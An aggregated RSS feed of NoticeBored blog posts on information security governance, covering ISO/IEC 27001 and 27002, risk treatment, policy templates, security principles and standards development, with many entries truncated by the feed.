This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-05T20:34:58+00:00 www.secnews.physaphae.fr NoticeBored - Experienced IT Security professional https://secawareblog.blogspot.com/ Unless you intended to drop out, please update your blogrolls, blog trackers, bookmarks or whatever.]]> 2022-11-13T17:50:02+00:00 http://blog.noticebored.com/2022/11/this-blog-has-been-renamed.html www.secnews.physaphae.fr/article.php?IdArticle=7986209 False None None None NoticeBored - Experienced IT Security professional  ... technical, physical, procedural, legal, social, mechanical, economic, political ...... applied to processes, systems, machines, people, quality ...... a volume knob that goes all the way to 11... automated, semi-automated or manual ... an illusion induced by acquiescence ... preventive, detective or corrective... avoiding or preventing badness... defining and applying rules... what happens in the tower ... an availability challenge ... an engineering solution... local, remote or hybrid ... hitting the sweet spot... keeping within limits... about mitigating risk... a means to an end... binary or analogue... providing direction ... setting boundaries ... negative feedback... power superiority... being in charge... being resilient ... an impression... management]]> 2022-08-15T14:00:00+00:00 http://blog.noticebored.com/2022/08/control-is.html www.secnews.physaphae.fr/article.php?IdArticle=6330826 False None None None NoticeBored - Experienced IT Security professional The business benefits of developing an information security strategy and accompanying security architecture/design include: Being proactive, taking the lead in this area - more puppeteer than puppet; Designing a framework or structure to support the organisation's unique situation and needs; Positioning and guiding the management of information risk and security within other aspect of the organisation's architecture/design e.g. its IT and information architecture (showing information flows, networked systems, databases, services etc.), complementing and supporting various other business strategies and architectures such as cloud first, artificial intelligence, IIoT, big data, new products, new markets ...);Providing a blueprint, mapping-out and clarifying the organisational structure, governance arrangements and accountabilities for information risk and security relative to other parts of the business such as IT, physical security, Risk, legal/compliance, HR, operations, business continuity, knowledge management ...; Defining a coherent sequence or matrix of strategic initiatives (projects, investments, business and technology changes ...) over the next N years, embedding information risk management ever deeper into the fabric of the organisation and strengthening the information security arrangements in various ways (e.g. systematically phasing-out and replacing aged/deprecated security technologies while researching, piloting and then adopting new ones such as blockchain and post-quantum crypto);Driving the development and maturity of the information risk and security management function, covering its priorities, internal structure and external working relationships, governance etc.; Bringing clarity and direction (focus!), reducing complexity and uncertainty associated with myriad 'other options' that are discounted or put on hold;Seizing opportunities to align and support various departments, processes, systems, partners, projects/initiatives, budgets, plans etc., finding and exploiting points of common interest, avoiding awkward conflicts and gaps;Identifying key objectives for information risk and security ]]> 2022-08-09T11:26:08+00:00 http://blog.noticebored.com/2022/08/the-business-case-for-security-strategy.html www.secnews.physaphae.fr/article.php?IdArticle=6206656 False Guideline None None NoticeBored - Experienced IT Security professional  ... when threat exploits vulnerability causing impact... tough to measure, express and control... the product of probability and impact... the gap between theory and practice... the root of pessimism and optimism ... the once-in-a-hundred-years event... needing seatbelts and airbags... a hair's breadth from disaster... the possibility of exploitation... mitigated but not eliminated ... a factor to be borne in mind... inevitable in the Real World... not going entirely to plan... outcome =/= prediction ... rarely good, usually bad... rarely bad, usually good... necessary to get ahead ]]> 2022-08-08T14:00:00+00:00 http://blog.noticebored.com/2022/08/risk-is.html www.secnews.physaphae.fr/article.php?IdArticle=6194069 False None None None NoticeBored - Experienced IT Security professional glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):]]> 2022-08-06T10:46:21+00:00 http://blog.noticebored.com/2022/08/a-glossy-nicely-constructed-and.html www.secnews.physaphae.fr/article.php?IdArticle=6150878 False Malware,Vulnerability,Threat,Patching,Guideline,Medical,Cloud APT 38,APT 19,APT 10,APT 37,Uber,APT 15,Guam,APT 28,APT 34 None NoticeBored - Experienced IT Security professional ... the arch-enemy - not the polar opposite - of resilience ... a natural consequence of complexity and dependence... when threat meets vulnerability exceeding control... not knowing whether, how and when it will break... being unable/unwilling/afraid to rely on it ... untrustworthy, inadequate controls ... pushing too far, too fast, too hard... exceeding the breaking strain... passing the point of no return... an engineering challenge ... inevitable at some point... hanging on by a thread ... often revealed too late... a propensity to failure ... being on a knife-edge... going over the brink... obvious in hindsight... being a snowflake... a smashed mirror... beyond the pale ... a broken vase... a cracked egg... a step too far... uncertainty... snap!...]]> 2022-08-01T14:00:00+00:00 http://blog.noticebored.com/2022/08/fragility-is.html www.secnews.physaphae.fr/article.php?IdArticle=6069757 False Vulnerability,Threat None 2.0000000000000000 NoticeBored - Experienced IT Security professional 2022-08-01T07:08:45+00:00 http://blog.noticebored.com/2022/08/webserver-problem-problem.html www.secnews.physaphae.fr/article.php?IdArticle=6064213 False None None None NoticeBored - Experienced IT Security professional This morning I bumped into a marketing/promotional piece announcing PageProof's certified "compliance" (conformity!) with "ISO 27001" (ISO/IEC 27001!). Naturally, they take the opportunity to mention that information security is an integral part of their products. The promo contrasts SOC2 against '27001 certification, explaining why they chose '27001 to gain some specific advantages such as GDPR compliance - and fair enough. In the US, compliance is A Big Thing. I get that. It occurs to me, though, that there are other, broader advantages to '27001 which the promo could also have mentioned, further valuable benefits of their newly-certified ISMS.I spot at least six general learning points here for organisations currently implementing ISO/IEC 27001: Elaborating on the broad business benefits of '27001 can be a creative and valuable activity in its own right. A well-designed and effective ISMS can achieve way more than protecting the confidentiality, integrity and availability of data, or satisfying GDPR and other compliance obligations. Although PageProof hints at some, it's unclear whether they truly appreciate its full potential but chose not to mention them in this promo. The eventual marketing/promotional value of '27001 certification is worth thinking-through. From the audience's perspective i.e. the organisation's third party stakeholders (particularly customers and prospects, plus partners, owners, regulators and other authorities), what worthwhile differences can they expect as a result of the certification? What are the main points that will truly resonate? How will successful certification be promoted, and how will it change the organisation's ongoing marketing, promotional and advertising activities - plus its operations (in order to satisfy if not exceed the market's expectations)? Rhetorical questions such as these may be raised and discussed at any point, ideally starting early-on in the ISMS design and implementation project, and gradually refined in the run-up to certification. Likewise, what about the internal corporate stakeholders - the managers, staff, contractors, consultants, interns etc.: how will the ISMS implementation project affect the workforce? What changes can they expect? What practical differences will the ISMS make? How can they get involved and help the process along (or at least avoid inadvertenly causing problems)? What are the key messages to be put across through internal communications at all stages of the project?Combining points 1-3 can help clarify the objectives of the ISMS - not just the detailed information risk and security objectives but more generally the business objectives, the rationale for doing all this stuff. What are the anticipated payoffs? Which of those be]]> 2022-07-26T10:03:09+00:00 http://blog.noticebored.com/2022/07/half-dozen-learning-points-from-27001.html www.secnews.physaphae.fr/article.php?IdArticle=5944094 False None None None NoticeBored - Experienced IT Security professional ... depending on others and being there for them when they need us most ... the rod bending alarmingly ... while landing a whopper ... an oak tree growing roots against the prevailing wind ... taking the punches, reeling but not out for the count... demonstrating, time after time, personal integrity ... willingness to seize opportunities, taking chances ... coping with social distancing, masks and all that... accumulating reserves for the bad times ahead ... the bloody-minded determination to press on ... disregarding trivia, focusing on what matters... a society for whom this piece resonates... deep resolve founded on inner strength... knowing it'll work out alright in the end... a word, a rich concept, a way of life... knowing when and how to concede ... more than 'putting on a brave face' ... a prerequisite for ultimate success ... facing up to adversity: bring it on... self-belief and trust in the team]]> 2022-07-25T08:51:16+00:00 http://blog.noticebored.com/2022/07/resilience-is.html www.secnews.physaphae.fr/article.php?IdArticle=5928738 False None None None NoticeBored - Experienced IT Security professional 2022-07-24T16:21:47+00:00 http://blog.noticebored.com/2022/07/risk-management-trumps-checklist.html www.secnews.physaphae.fr/article.php?IdArticle=5915454 False None None None NoticeBored - Experienced IT Security professional  Prompted by some valuable customer feedback earlier this week, I've been thinking about how best to update the SecAware policy template on software/systems development. The customer is apparently seeking guidance on integrating infosec into the development process, which begs the question "Which development process?". These days, we're spoilt for choice with quite a variety of methods and approaches. Reducing the problem to its fundamentals, there is a desire to end up with software/systems that are 'adequately secure', meaning no unacceptable information risks remain. That implies having systematically identified and evaluated the information risks at some earlier point, and treated them appropriately - but how?The traditional waterfall development method works sequentially from business analysis and requirements definition, through design and development, to testing and release - often many months later. Systems security ought to be an integral part of the requirements up-front, and I appreciate from experience just how hard it is to retro-fit security into a waterfall project that has been runnning for more than a few days or weeks without security involvement.A significant issue with waterfall is that things can change substantially in the course of development: the organisation hopefully ends up with the system it originally planned, but that may no longer be the system it needs. If the planned security controls turn out to be inadequate in practice, too bad: the next release or version may be months or years away, if ever (assuming the same waterfall approach is used for maintenance, which is not necessarily so*). The quality of the security specification and design (which drives the security design, development and testing) depends on the identification and evaluation of information risks in advance, predicting threats, vulnerabilities and impacts likely to be of concern at the point of delivery some time hence.In contrast, lean, agile or rapid application development methods cycle through smaller iterations more quickly, presenting more opportunities to update security ... but also more chances to break security due to the hectic pace of change. A key problem is to keep everyone focused on security throughout the process, ensuring that whatever else is going on, sufficient attention is paid to the security aspects. Rapid decision-making is part of the challenge here. It's not just the method that needs to be agile!DevOps and scrum approaches use feedback from users on each mini-release to inform the ongoing development. Hopefully security is part of that feedback loop so that it improves incrementally at the same time, but 'hopefully' is a massive clue: if users and managers are not sufficiently security-aware to push for improvements or resist degradat]]> 2022-07-22T17:10:27+00:00 http://blog.noticebored.com/2022/07/security-in-software-development.html www.secnews.physaphae.fr/article.php?IdArticle=5871325 False Guideline None None NoticeBored - Experienced IT Security professional In the context of the ISO management systems standards, the internal audit process and accredited certification systems as a whole, are assurance controls primarily intended to confirm that organisations' management systems conform to the explicit requirements formally expressed in the respective ISO standards.A conformant management system, in turn, is expected to manage (design, direct, control, monitor, maintain …) something: for ISO/IEC 27001, that 'something-being-managed' is the suite of information security controls and other means of addressing the organisation's information risks (called 'information security risks' or 'cybersecurity risks' in the standards). For ISO 9001, it is the quality assurance activities designed to ensure that the organisation's products (goods and services) are fit for purpose. For ISO 14001, it is the controls and activities necessary to minimise environmental damage.My point is that the somethings-being-managed are conceptually distinct from the  'management systems' through which managers exert their direction and control. This is a fundamental part of the ISO management systems approach, allowing ISO to specify systems required to manage a wide variety of somethings in a similar way - a governance approach in fact.Management system certification auditors, whose sole purpose is to audit clients' management systems' conformity with the requirements expressed in the standards, have only a passing interest in those somethings-being-managed, essentially checking that they are indeed being actively managed through the management system, thereby proving that the management system is in fact operational and not just a nice neat set of policies and procedures on paper.Management system internal auditors, in contrast, may be given a wider brief by management which may include probing further into the somethings being managed ... but that's down to management's decision about the scope and purpose of the internal audits, not a formal requirement of the standards. Management may just as easily decide to have the internal auditors stick to the management system standard conformity aspects, just the same as the certification auditors.]]> 2022-07-21T19:13:52+00:00 http://blog.noticebored.com/2022/07/iso-management-systems-assurance.html www.secnews.physaphae.fr/article.php?IdArticle=5850532 False None None None NoticeBored - Experienced IT Security professional Having put it off for far too long, I'm belatedly trying to catch up with some standards work in the area of Root of Trust, which for me meant starting with the basics, studying simple introductory articles about RoT.As far as I can tell so far, RoT is a concept -  the logical basis, the foundation on which secure IT systems are built.'Secure IT systems' covers a huge range. At the high end are those used for national security and defence purposes, plus safety- and business-critical systems facing enormous risks (substantial threats and impacts). At the low end are systems where the threats are mostly accidental and the impacts negligible - perhaps mildly annoying. Not being able to tell precisely how many steps you've taken today, or being unable to read this blog, is hardly going to stop the Earth spinning on its axis. In fact' mildly' may be overstating it.'Systems' may be servers, desktops, portables and wearables, plus IoT things and all manner of embedded devices - such as the computers in any modern car or plane controlling the engine, fuel, comms, passenger entertainment, navigation and more, or the smart controller for a pacemaker Trust me, you don't want your emotionally disturbed ex-partner gaining anonymous remote control of your brakes, altimeter or pacemaker.In  terms of the layers, we the people using IT are tottering precariously on the top of a house of cards. We interact with application software, interacting with the operating system and, via drivers and microcode, the underlying hardware. A 'secure system' is a load of software running on a bunch of hardware, where the software has been designed to distrust the users and administrators, other software and the hardware, all the way down to, typically, a Hardware Security Module, Trusted Platform Module or similar dedicated security device, subsystem or chip. Ironically in relation to RoT, distrust is the default, particularly for the lower layers unless/until they have been authenticated - but there's the rub: towards the bottom of the stack, how can low-level software be sure it is interacting with and authenticating the anticipated security hardware if all it can do is send and receive signals or messages? Likewise, how can the module be sure it is interacting with the appropriate low-level software? What prevents a naughty bit of software acting as a middleman between the two, faking the expected commands and manipulating the responses in order to subvert the authentication controls? What prevents a nerdy hacker connecting logic and scope probes to the module's ports in order to monitor and maybe inject signals - or just noise to see how well the system copes? How about a we]]> 2022-07-18T16:45:38+00:00 http://blog.noticebored.com/2022/07/skyscraper-of-cards.html www.secnews.physaphae.fr/article.php?IdArticle=5812291 False None None None NoticeBored - Experienced IT Security professional Online Safety Bill. It is written in extreme legalese, peppered with strange terms defined in excruciating detail, and littered with internal and external cross-references, hardly any of which are hyperlinked e.g.]]> 2022-07-10T13:41:08+00:00 http://blog.noticebored.com/2022/07/complexity-simplified.html www.secnews.physaphae.fr/article.php?IdArticle=5638390 False Guideline APT 10 None NoticeBored - Experienced IT Security professional  Compliance is a concern that pops up repeatedly on the ISO27k Forum, just this  morning for instance. Intrigued by ISO 27001 Annex A control A.18.1.1 "Identification of applicable legislation and contractual requirements", members generally ask what laws are relevant to the ISMS. That's a tough one to answer for two reasons.  Firstly, I'm not a lawyer so I am unqualified and unable to offer legal advice. To be honest, I'm barely familiar with the laws and regs in the UK/EU and NZ, having lived and worked here for long enough to absorb a little knowledge. The best I can offer is layman's perspective. I feel more confident about the underlying generic principles of risk, compliance, conformity, obligations, accountabilities, assurance and controls though, and have the breadth of work and life experience to appreciate the next point ...Secondly, there is a huge range of laws and regs that have some relevance to information risk, security, management and the ISMS. The mind map is a brief glimpse of the landscape, as I see it ...That's a heady mix of laws and regs that apply to the organisation, its officers and workers, its property and finances, its technologies, its contracts, agreements and relationships with employees and third parties including the authorities, owners, suppliers, partners, prospects and customers, and society at large. There are obligations relating to how it is structured, operated, governed, managed and controlled, plus all manner of internal rules voluntarily adopted by management for business reasons (some of which concern obligations under applicable laws and regs). Noncompliance and nonconformity open the can-o-worms still wider with obligations and expectations about 'awareness', 'due process', 'proof' and more, much more.That A.18.1.1 control is - how shall I put it - idealistic:"All relevant legislative statutory, regulatory, contractual requirements and the organization's approach to meet these requirements shall be explicitly identified, documented and kept up to date for each information system and the organization."All requirements?! Oh boy! Explicit! Documented! Maintained! This is bewildering, scary stuff, especially for relatively inexperienced infosec or cybersecurity professionals who seldom set foot outside of the IT domain. We're definitely in the]]> 2022-07-05T11:41:40+00:00 http://blog.noticebored.com/2022/07/the-discomfort-zone.html www.secnews.physaphae.fr/article.php?IdArticle=5555746 False Guideline None None NoticeBored - Experienced IT Security professional News emerged during June of likely further delays to the publication of the third edition of ISO/IEC 27001, this time due to the need to re-align the main body clauses with ISO's revised management systems template. The planned release in October is in some doubt. Although we already have considerable discretion over which information security controls are being managed within our ISO/IEC 27001 Information Security Management Systems today, an unfortunate side-effect of standardisation, harmonisation, adoption, accreditation and certification is substantial inertia in the system as a whole. It's a significant issue for our field where the threats, vulnerabilities, impacts and controls are constantly shifting and often moving rapidly ahead of us … but to be honest it's equally problematic for other emerging and fast-moving fields. Infosec is hardly special in this regard. Just look at what's happening in microelectronics, IT, telecomms, robotics, environmental protection and globalisation generally for examples. One possible route out of the tar-pit we've unfortunately slid into is to develop forward-thinking 'future-proof' standards and release them sooner, before things mature, but that's a risky approach given uncertainties ahead. It would not be good for ill-conceived/premature standards to drive markets and users in inappropriate directions. It's also tough for such a large, ponderous, conservative committee as ISO/IEC JTC 1/SC 27. However, the smart city privacy standard ISO/IEC TS 27570 is a shining beacon of light, with promising signs for the developing security standards on Artificial Intelligence and big data security too. I wish I could say the same of 'cyber', cloud and IoT security but (IMNSHO) the committee is struggling to keep pace with these fields, despite some fabulous inputs and proactive support from members plus the likes of the Cloud Security Alliance and NIST.  The floggings will continue until morale improves.Another tar-pit escape plan involves speeding-up the standards development process, perhaps also the promotion, accreditation and certification processes that follow each standard's publication – but again there are risks in moving ahead too fast, compromising the quality and value of the standards, damaging ISO/IEC's established brands. ]]> 2022-07-02T12:23:41+00:00 http://blog.noticebored.com/2022/07/standards-development-tough-risky.html www.secnews.physaphae.fr/article.php?IdArticle=5501958 False Guideline None None NoticeBored - Experienced IT Security professional Here's an insightful and enjoyable way to explore your psyche and vent a little tension at the end of a tough month.First, find yourself a private space to watch Tears for Fears.Now shout, shout, let it all out: what are the things you could do without?  Come on, I'm talking to you, come on.Grab a scrap of paper and start writing down the things you could do without. You'll find yourself stimulated by your own words to think of other things, other stuff you don't want, don't like, can't stand, even hate. Fine, scribble away.How's it going? How do you feel now - vented? Released? If it all gets too much, take a break. Set your list aside to ferment for a while - as long as it takes. There's no rush. You're the boss. If you are so inclined, come back later to tidy up your list and make sense of it. How you do that is up to you. For me, it's mind-mapping, grouping things together, drawing links and doodling. I'll show you mine - well an uncontroversial snippet anyway ...When you're ready, fully vented, destroy that bit of paper. Let it go, or maybe rip it up and start again.]]> 2022-07-01T13:00:00+00:00 http://blog.noticebored.com/2022/07/shout-shout-let-it-all-out.html www.secnews.physaphae.fr/article.php?IdArticle=5479651 False None None None NoticeBored - Experienced IT Security professional Control 5.9 in ISO/IEC 27002:2022 recommends an inventory of information assets that should be “accurate, up to date, consistent and aligned with other inventories”.  Fair enough, but what are 'information assets'? What, exactly, are we supposed to be inventorying? The standard refers repeatedly but enigmatically to "information and other associated assets" that an organisation's Information Security Management System protects. The intended meaning of 'information asset' has been a bone of contention within ISO/IEC JTC 1/SC 27 for years, some experts and national bodies vehemently disagreeing with each other until, eventually, a fragile ceasefire was declared in order to move forward on the numerous standards projects that hinge on the term.  Currently, '27002 provides a rather broad and unhelpful definition of "asset" as "anything that has value to the organisation" - paperclips, for instance, fall within the definition. Does that mean your ISMS should protect paperclips since, arguably, they are 'associated with information', albeit very low value assets. I know this is reductio ad absurdam but it illustrates the tar pit that SC 27 found itself in.On a more pragmatic note, I have consciously taken a wide view of information assets in preparing a checklist of information assets for SecAware. I intend to set you thinking about the potential scope, purpose and focal points of your ISMS. You may feel that certain items on the checklist are irrelevant ... or the checklist might just open your eyes to entire categories of valuable information that you hadn't even considered. Whether they end up in or out of scope of your ISMS is for you and your management colleagues to determine. I'm simply giving you food for thought. ]]> 2022-06-30T16:35:04+00:00 http://blog.noticebored.com/2022/06/what-are-information-assets.html www.secnews.physaphae.fr/article.php?IdArticle=5464305 False None None None NoticeBored - Experienced IT Security professional ISO27k Forum yesterday morning, I wrote and published a simple 2-page exemptions policy template for SecAware. In essence, after explaining what 'exemptions' are, the policy requires that they are authorised after due consideration by management, specifically the relevant Information Owners. Exemption decisions should also be recorded, hinting at a process and some sort of exemptions log. I'm wondering now whether to write a procedure as well, including a basic log template as a starting point. I'm also contemplating writing something on accountability and responsibility, and perhaps generic incident management and post incident review procedures to accompany the incident management policy.  ]]> 2022-06-30T13:02:25+00:00 http://blog.noticebored.com/2022/06/authorised-exemptions.html www.secnews.physaphae.fr/article.php?IdArticle=5461798 False None None None NoticeBored - Experienced IT Security professional ISO/IEC 27001 is so succinct that it leaves readers perplexed as to what 'context' even means.  It stops short of explaining how to determine and make use of various 'internal and external issues' in an Information Security Management System. So, to help clients, I wrote and released a pragmatic 5-page management guideline on this for the SecAware ISMS toolkit, expanding on this neat little summary diagram: With about a thousand words of explanation and pragmatic advice, the guideline has roughly ten times as many words as clauses 4.1 and 4.2 ... or twenty times if you accept that the picture is worth a thousand words. It was written independently of, and complements, ISO/IEC 27003's advice in this area.Although I am happy with the SecAware ISMS toolkit materials as they are, I'm always looking for improvement opportunities, ways to add more value for clients. I'm currently working on, or at least thinking about:A set of fundamental information risk and security principles;A guideline on the Risk Treatment Plan and Statement of Applicability;Something on security engineering. ]]> 2022-06-28T08:29:13+00:00 http://blog.noticebored.com/2022/06/the-business-context-for-information.html www.secnews.physaphae.fr/article.php?IdArticle=5422140 False None None None NoticeBored - Experienced IT Security professional  For some curious reason, the Statement of Applicability steals the limelight in the ISO27k world, despite being little more than a formality. Having recently blogged about the dreaded SoA, 'nuff said on that.Today I'm picking up on the SoA's shy little brother, the Risk Treatment Plan. There's a lot to say and think about here, so coffee-up, settle-down, sit forward and zone-in.ISO/IEC 27001 barely even acknowledges the RTP. Here are the first two mentions, tucked discreetly under clause 6.1.3:]]> 2022-06-24T13:40:08+00:00 http://blog.noticebored.com/2022/06/the-sadly-neglected-risk-treatment-plan.html www.secnews.physaphae.fr/article.php?IdArticle=5350915 False Threat,Guideline APT 19,APT 10 4.0000000000000000 NoticeBored - Experienced IT Security professional Thinking about the principles underpinning information risk and security, here's a tidy little stack of "Hinson tips" - one-liners to set the old brain cells working this chilly mid-Winter morning:Address information confidentiality, integrity and availability, broadlyAddress internal and external threats, both deliberate and accidental/naturalCelebrate security wins: they are rare and valuableComplete security is unattainable, an oxymoronComplexity is the arch-enemy of security: the devil's in the details Consider all stakeholders - users, administrators, maintainers and attackers Consider threats, vulnerabilities and impacts Controls modify or maintain riskDefence-in-depth layers complementary controls of different typesDon't trust anything untrustworthy Ensure business continuity through resilience, recovery and contingencyEven barely sufficient security is a business-enablerExcessive security is a business-impediment, more likely to be bypassedExploiting information can be a good or a bad thing, depending on contextFailure is a possibility, so fail-safe means fail-secure Focus on significant risks and the associated key controlsGeneral-purpose controls such as oversight and awareness bolster the restGiven practical limits to attainable security, residual risks are inevitableGood security isn't costly: it's valuable, good for business Identify, evaluate and treat risks systematicallyInformation content is a valuable yet vulnerable assetLack of control is neither threat nor vulnerabilityOffensive security is a viable approach, within reasonPeople can be our greatest threats and our most valuable alliesReducing exposure reduces riskResidual (e.g. accepted, shared or unidentified) risks ar]]> 2022-06-22T09:36:12+00:00 http://blog.noticebored.com/2022/06/infosec-principles-hinson-tips.html www.secnews.physaphae.fr/article.php?IdArticle=5314595 False Threat None None NoticeBored - Experienced IT Security professional SecAware corporate information security policy template incorporates a set of generic principles for information risk and security such as "Our Information Security Management System conforms to generally accepted good security practices as described in the ISO/IEC 27000-series information security standards." and "Information is a valuable business asset that must be protected against inappropriate activities or harm, yet exploited appropriately for the benefit of the organization." Despite being reasonably happy with the 7 principles I selected, I would prefer to base the policy on a generally-accepted set of infosec principles, akin to the OECD Privacy Principles first published with remarkable foresight way back in 1980.   There are in fact several different sets of principles Out There, often incomplete and imprecisely stated. Different authors take different perspectives, emphasizing different aspects, and the contexts and purposes also differ.  It will be an 'interesting' challenge for ISO/IEC JTC 1/SC 27 to tease out, elaborate on, fine-tune and hopefully reach consensus on a reasonably succinct, coherent, comprehensive set of generally-applicable 'concepts and principles' for the next edition of ISO/IEC 27000.  I just hope the learned committee doesn't end up specifying a racehorse looking something like this ... ]]> 2022-06-21T11:28:45+00:00 http://blog.noticebored.com/2022/06/wanted-set-of-infosec-principles-we-can.html www.secnews.physaphae.fr/article.php?IdArticle=5303407 False None None None NoticeBored - Experienced IT Security professional security policy templates and ISO27k ISMS materials.The main change was to distinguish conformity from compliance - two similar terms that I admit I had been using loosely and often incorrectly for far too long. As I now understand them:Compliance refers to fulfilling binding (mandatory) legal, regulatory and contractual obligations; Conformity concerns fulfilling optional (discretionary) requirements in standards, agreements, codes of ethics etc. It's a fine distinction with implications for the associated information risks, given differing impacts: Noncompliance may lead to legal enforcement action (fines/penalties), other costly sanctions (such as more intrusive monitoring by the authorities and perhaps revocation of operating licenses) and business issues (such as reputational damage and brand devaluation, plus the costs of defending legal action). The consequences of nonconformity may be trivial or nothing at all if nobody even cares, but can also involve business issues such as inefficiencies, excess costs and so on, particularly if customers, business partners, the authorities or other stakeholders are seriously concerned at management's apparent disregard for good security practices.Certification of an organisation's ISMS, then, demonstrates its conformity with, not compliance to, ISO/IEC 27001 - well in most cases anyway, where management voluntarily chooses to adopt and conform to the standard. If they are obliged by some mandatory, legally-binding requirement (an applicable law or regulation, or perhaps terms in a formal contract with a supplier or customer, or perhaps a law or regulation), I guess they must comply. Putting that another way, nonconformity is an option. Noncompliance isn't.Anyway, having adjusted the terminology and tweaked the SecAware materials, I took the opportunity to prepare two new 'bulk deal' packages - a comprehensive suite of information security policy templates, and a full set of ISO27k ISMS materials. I'm hoping to persuade customers to spend invest a little more for greater returns. The SecAware policies, for instance, are explicitly designed to work best as a whole, an integrated and coherent suite as opposed to an eclectic collection of policies on various discrete topics. In recent years, I have developed a spreadsheet to track the mesh of relationships between policies:]]> 2022-06-19T09:54:39+00:00 http://blog.noticebored.com/2022/06/the-matrix-policy-edition.html www.secnews.physaphae.fr/article.php?IdArticle=5259269 False Guideline None None NoticeBored - Experienced IT Security professional To celebrate the publication of ISO/IEC 27400:2022 today, we have slashed the price for our IoT security policy templates to just $10 each through SecAware.com.IoT policy is the first of the basic security controls shown on the 'risk-control spectrum' diagram above, and is Control-01 in the new standard ...Do you have a security policy on IoT? If not, does that mean IoT is out of control in your organisation? Even if you do, what does it say? Is it valid, appropriate, worthwhile, sufficient? The spectrum diagram shows quite a variety of risks and controls, but it is merely a summary, selected highlights. Attempting to cover them all in a policy document would be counterproductive - in fact, general employees can barely cope with a much-simplified one-page 'acceptable use policy'. The new ISO/IEC 27400 standard takes a broad perspective with copious advice on information security and privacy for the designers, manufacturers, purchasers, users and administrators of IoT things.]]> 2022-06-14T11:09:22+00:00 http://blog.noticebored.com/2022/06/isoiec-27400-iot-security-and-privacy.html www.secnews.physaphae.fr/article.php?IdArticle=5137361 False None None None NoticeBored - Experienced IT Security professional An ISO/IEC JTC 1/SC 27 meeting last night was informed that the planned amendment to ISO/IEC 27001:2013 is to be absorbed into a new third edition of the standard to become ISO/IEC 27001:2022.Apparently, the new 2022 version of '27001 will have minor editorial corrections in the main body text (including one of the two corrigenda published previously), a small but valuable clarification to the notes on subclause 6.1.3, and a complete replacement for Annex A reflecting ISO/IEC 27002:2022.The transition arrangements are still uncertain but this is my understanding:Nobody will be able to use ISO/IEC 27001:2022 formally until it is published, hopefully on October 1st;The International Accreditation Forum will publish a mandate for the national accreditation bodies (such as IANZ here in New Zealand) at the same time, with details of the 3 year transition period:Accreditation and certification bodies will be required to update their processes, and train and prepare auditors for accreditation and certification against the new standard within a year of its release;Organisations may wish to be certified against the new standard as soon as the certification bodies are ready to do so, or may (continue to) use the old standard for up to three years beyond its release, meaning a full certification cycle;Already (right now), organisations are free to declare any or all of the controls in ISO/IEC 27001:2013 Annex A inapplicable in their Statement of Applicability, instead opting to use an appropriate selection of controls e.g. from ISO/IEC 27002:2022, NIST SP800-50, NIST CSF, ISF, COBIT, CSA, GDPR, PCI-DSS and whatever other sources they like (including entirely custom control sets) in accordance with the current ISO/IEC 27001:2013 clause 6.1.3 note 2, which says in part "The control objectives andcontrols listed in Annex A are not exhaustive and additional control objectives and controls may be needed." Regardless of where the controls come from, organisations must:]]> 2022-06-08T16:28:55+00:00 http://blog.noticebored.com/2022/06/third-edition-of-isoiec-27001-coming.html www.secnews.physaphae.fr/article.php?IdArticle=5034617 False None None None NoticeBored - Experienced IT Security professional Subclause 6.1.3 of ISO/IEC 27001:2013 requires compliant organisations to define and apply an information security risk treatment process to:a) select appropriate information security risk treatment options, taking account of the risk assessment results;The 'risk treatment options' (including the information security controls) must be 'appropriate' and must 'take account of ' (clearly relate to) the 'risk assessment results'. The organisation cannot adopt a generic suite of information security controls simply on the basis that they have been recommended or suggested by someone - not even if they are noted in Annex A.b) determine all controls that are necessary to implement the information security risk treatment option(s) chosen;NOTE Organizations can design controls as required, or identify them from any source.This requirement clearly specifies the need to determine all the controls that the organisation deems necessary to mitigate unacceptable information risks. Note, however, that it doesn't actually demand they are fully implemented: see point d) below.c) compare the controls determined in 6.1.3 b) above with those in Annex A and verify that no necessary controls have been omitted; NOTE 1 Annex A contains a comprehensive list of control objectives and controls. Users of this International Standard are directed to Annex A to ensure that no necessary controls are overlooked. NOTE 2 Control objectives are implicitly included in the controls chosen. The control objectives and controls listed in Annex A are not exhaustive and additional control objectives and cont]]> 2022-06-06T10:06:44+00:00 http://blog.noticebored.com/2022/06/the-dreaded-statement-of-applicability.html www.secnews.physaphae.fr/article.php?IdArticle=5001393 False Guideline None None NoticeBored - Experienced IT Security professional An article by the 50-year-old University of York Department of Computer Science outlines algorithmic approaches in Artificial Intelligence. Here are the highlights:Linear sequence: progresses directly through a series of tasks/statements, one after the other.Conditional: decides between courses of action according to the conditions set (e.g. if X is 10 then do Y, otherwise do Z).Loop: sequential statements are repeated. Sequential statements are repeated.Brute force: tries approaches systematically, blocking off dead ends to leave only viable routes to get closer to a solution.Recursive: apply the learning from a series of small episodes to larger problems of the same type.Backtracking: incrementally builds a data set of all possible solutions, retracing or undoing/reversing its last step if unsuccessful in order to pursue other pathways until a satisfactory result is reached. Greedy: quickly goes to the most obvious solution (low-hanging fruit) and stops. Dynamic programming: outcomes of prior runs (solved sub-problems) inform new approaches. Divide and conquer: divides the problem into smaller parts, then consolidates the solutions into an overall result.Supervised learning: programmers train the system using structured data, indicating the correct answers. The system learns to recognise patterns and hence deduce the correct results itself when fed new data.Unsupervised learning: the system is fed unlabeled ('raw') input data that it autonomously mines for rules, detecting patterns, summarising and grouping data points to describe the data set and offer meaningful insights to users, even if the humans don't know what they're looking for.Reinforcement learning: the system learns from its interactions with the environment, utilising these observations to take actions that either maximise the reward or minimise the risk.Aside from computerised AI, we humans use similar approaches naturally, for instance when developing and implementing information security policies:Linear sequence: start with some sort of list of desireable policies, sorted in some manner, working down from top to the bottom.]]> 2022-05-29T09:50:29+00:00 http://blog.noticebored.com/2022/05/algo-rhythmic-infosec.html www.secnews.physaphae.fr/article.php?IdArticle=4865572 False None None None NoticeBored - Experienced IT Security professional   Here's a simple, generic way to manage virtually anything, particularly complex and dynamic things: Think of something to do Try itWatch what happensDiscover and learnIdentify potential improvementsGOTO 1It's a naive programmer's version of Deming's plan-do-check-act cycle - an iterative approach to continuous improvement that has proven very successful in various 